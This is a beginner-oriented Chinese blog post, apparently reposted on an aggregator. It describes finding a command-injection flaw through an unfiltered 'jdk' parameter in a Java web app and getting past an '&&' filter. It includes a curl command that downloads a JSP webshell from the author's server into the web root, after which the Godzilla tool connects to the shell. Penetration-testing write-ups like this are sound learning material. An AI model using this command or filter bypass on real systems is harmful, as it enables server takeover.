从命令执行到GetShell,适合新手学习

Posted kali_Ma

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了从命令执行到GetShell,适合新手学习相关的知识,希望对你有一定的参考价值。

最近做项目遇到一个比较典型命令执行漏洞,适合新手学习,给大家分享下整个过程。

从代码中可以看出来程序只使用trim()方法对jdk进行了两遍的空格过滤,然后直接和后面拼接的命令一起执行。

接着来找一下这个方法的调用链,

可以看到这里依次调用了3个命令执行的方法,如果命令都能成功执行的话,可以执行3次。

然后找一下这个jdk参数是否是我们可控的,

上面的代码显示jdk这个参数是从请求中获取的,看到这里已经能确定是个命令执行漏洞了,下面我们来利用这个漏洞。

执行了ls&&结果报错,看显示结果发现过滤了&&,然后把&转编码发现还是会报错,但是从服务端代码来看并没有做参数的过滤。

最终经过多次FUZZ尝试发现在命令后面加上%20aa就可以正常执行命令了,尝试直接echo写shell没成功,使用下载文件的方式getshell。

搭建一个http服务,添加一句话木马文件

执行下面的命令进行getshell

curl%20-o%20../../webapps/xxxxx/xx.jsp%20http://xx.xx.xx.xx/hoo.jsp%20aa

使用哥斯拉进行连接

2021最新整理网络安全\\渗透测试/安全学习(全套视频、大厂面经、精品手册。必备工具包)戳我拿

以上是关于从命令执行到GetShell,适合新手学习的主要内容,如果未能解决你的问题,请参考以下文章

Java新手从入门到精通的学习建议

IOS开发-OC学习-常用功能代码片段整理

ZZZPHP1.61 代码审计-从SQL注入到Getshell

逆向及Bof基础实践

201555332盛照宗—网络对抗实验1—逆向与bof基础

尚硅谷MySQL从新手到老手(适合MySQL萌新零基础人员学习)2018高清完整资源